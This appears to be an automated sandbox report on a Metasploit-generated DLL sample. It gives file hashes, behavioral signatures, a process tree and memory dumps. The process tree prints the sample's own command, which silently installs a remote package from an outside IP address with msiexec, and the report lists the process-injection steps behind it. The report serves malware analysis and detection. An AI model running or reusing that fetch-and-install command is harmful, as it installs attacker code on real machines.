Analysis
-
max time kernel
46s -
max time network
43s -
platform
windows7_x64 -
resource
win7-20220414-en -
submitted
03-06-2022 13:58
Static task
static1
Behavioral task
behavioral1
Sample
12ed6d183cc130f8a7c33418013a05ffbec817a2981e987ef5931e0e9245d7c5.dll
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
12ed6d183cc130f8a7c33418013a05ffbec817a2981e987ef5931e0e9245d7c5.dll
Resource
win10v2004-20220414-en
General
-
Target
12ed6d183cc130f8a7c33418013a05ffbec817a2981e987ef5931e0e9245d7c5.dll
-
Size
5KB
-
MD5
d9337ff3c22d2a4258890fd38c5e7d7f
-
SHA1
6dae55e6a58b612fedb42ebb73a77f9c4b932e27
-
SHA256
12ed6d183cc130f8a7c33418013a05ffbec817a2981e987ef5931e0e9245d7c5
-
SHA512
166d9dd0c11cc8d685868e976014938d1abfbb087485324f720b76002e44250309e618622461b6203ea6470dedec62002bea3bda32f4ebf7ef385c78327315ac
Malware Config
Extracted
metasploit
windows/single_exec
Signatures
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Blocklisted process makes network request 1 IoCs
Processes:
msiexec.exeflow pid process 3 2016 msiexec.exe -
Use of msiexec (install) with remote resource 1 IoCs
Processes:
msiexec.exepid process 2028 msiexec.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
rundll32.exedescription pid process target process PID 616 set thread context of 760 616 rundll32.exe rundll32.exe -
Suspicious use of AdjustPrivilegeToken 34 IoCs
Processes:
msiexec.exemsiexec.exedescription pid process Token: SeShutdownPrivilege 2028 msiexec.exe Token: SeIncreaseQuotaPrivilege 2028 msiexec.exe Token: SeRestorePrivilege 2016 msiexec.exe Token: SeTakeOwnershipPrivilege 2016 msiexec.exe Token: SeSecurityPrivilege 2016 msiexec.exe Token: SeCreateTokenPrivilege 2028 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 2028 msiexec.exe Token: SeLockMemoryPrivilege 2028 msiexec.exe Token: SeIncreaseQuotaPrivilege 2028 msiexec.exe Token: SeMachineAccountPrivilege 2028 msiexec.exe Token: SeTcbPrivilege 2028 msiexec.exe Token: SeSecurityPrivilege 2028 msiexec.exe Token: SeTakeOwnershipPrivilege 2028 msiexec.exe Token: SeLoadDriverPrivilege 2028 msiexec.exe Token: SeSystemProfilePrivilege 2028 msiexec.exe Token: SeSystemtimePrivilege 2028 msiexec.exe Token: SeProfSingleProcessPrivilege 2028 msiexec.exe Token: SeIncBasePriorityPrivilege 2028 msiexec.exe Token: SeCreatePagefilePrivilege 2028 msiexec.exe Token: SeCreatePermanentPrivilege 2028 msiexec.exe Token: SeBackupPrivilege 2028 msiexec.exe Token: SeRestorePrivilege 2028 msiexec.exe Token: SeShutdownPrivilege 2028 msiexec.exe Token: SeDebugPrivilege 2028 msiexec.exe Token: SeAuditPrivilege 2028 msiexec.exe Token: SeSystemEnvironmentPrivilege 2028 msiexec.exe Token: SeChangeNotifyPrivilege 2028 msiexec.exe Token: SeRemoteShutdownPrivilege 2028 msiexec.exe Token: SeUndockPrivilege 2028 msiexec.exe Token: SeSyncAgentPrivilege 2028 msiexec.exe Token: SeEnableDelegationPrivilege 2028 msiexec.exe Token: SeManageVolumePrivilege 2028 msiexec.exe Token: SeImpersonatePrivilege 2028 msiexec.exe Token: SeCreateGlobalPrivilege 2028 msiexec.exe -
Suspicious use of WriteProcessMemory 22 IoCs
Processes:
rundll32.exerundll32.exerundll32.exedescription pid process target process PID 1704 wrote to memory of 616 1704 rundll32.exe rundll32.exe PID 1704 wrote to memory of 616 1704 rundll32.exe rundll32.exe PID 1704 wrote to memory of 616 1704 rundll32.exe rundll32.exe PID 1704 wrote to memory of 616 1704 rundll32.exe rundll32.exe PID 1704 wrote to memory of 616 1704 rundll32.exe rundll32.exe PID 1704 wrote to memory of 616 1704 rundll32.exe rundll32.exe PID 1704 wrote to memory of 616 1704 rundll32.exe rundll32.exe PID 616 wrote to memory of 760 616 rundll32.exe rundll32.exe PID 616 wrote to memory of 760 616 rundll32.exe rundll32.exe PID 616 wrote to memory of 760 616 rundll32.exe rundll32.exe PID 616 wrote to memory of 760 616 rundll32.exe rundll32.exe PID 616 wrote to memory of 760 616 rundll32.exe rundll32.exe PID 616 wrote to memory of 760 616 rundll32.exe rundll32.exe PID 616 wrote to memory of 760 616 rundll32.exe rundll32.exe PID 616 wrote to memory of 760 616 rundll32.exe rundll32.exe PID 760 wrote to memory of 2028 760 rundll32.exe msiexec.exe PID 760 wrote to memory of 2028 760 rundll32.exe msiexec.exe PID 760 wrote to memory of 2028 760 rundll32.exe msiexec.exe PID 760 wrote to memory of 2028 760 rundll32.exe msiexec.exe PID 760 wrote to memory of 2028 760 rundll32.exe msiexec.exe PID 760 wrote to memory of 2028 760 rundll32.exe msiexec.exe PID 760 wrote to memory of 2028 760 rundll32.exe msiexec.exe
Processes
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\12ed6d183cc130f8a7c33418013a05ffbec817a2981e987ef5931e0e9245d7c5.dll,#11⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\12ed6d183cc130f8a7c33418013a05ffbec817a2981e987ef5931e0e9245d7c5.dll,#12⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\msiexec.exemsiexec /i http://23.227.200.242:2650/hbYDuh9tfbBfVYg7up.jpg /q4⤵
- Use of msiexec (install) with remote resource
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/616-54-0x0000000000000000-mapping.dmp
-
memory/616-55-0x00000000755B1000-0x00000000755B3000-memory.dmpFilesize
8KB
-
memory/760-56-0x000000000048178C-mapping.dmp
-
memory/2016-60-0x000007FEFBB71000-0x000007FEFBB73000-memory.dmpFilesize
8KB
-
memory/2028-58-0x0000000000000000-mapping.dmp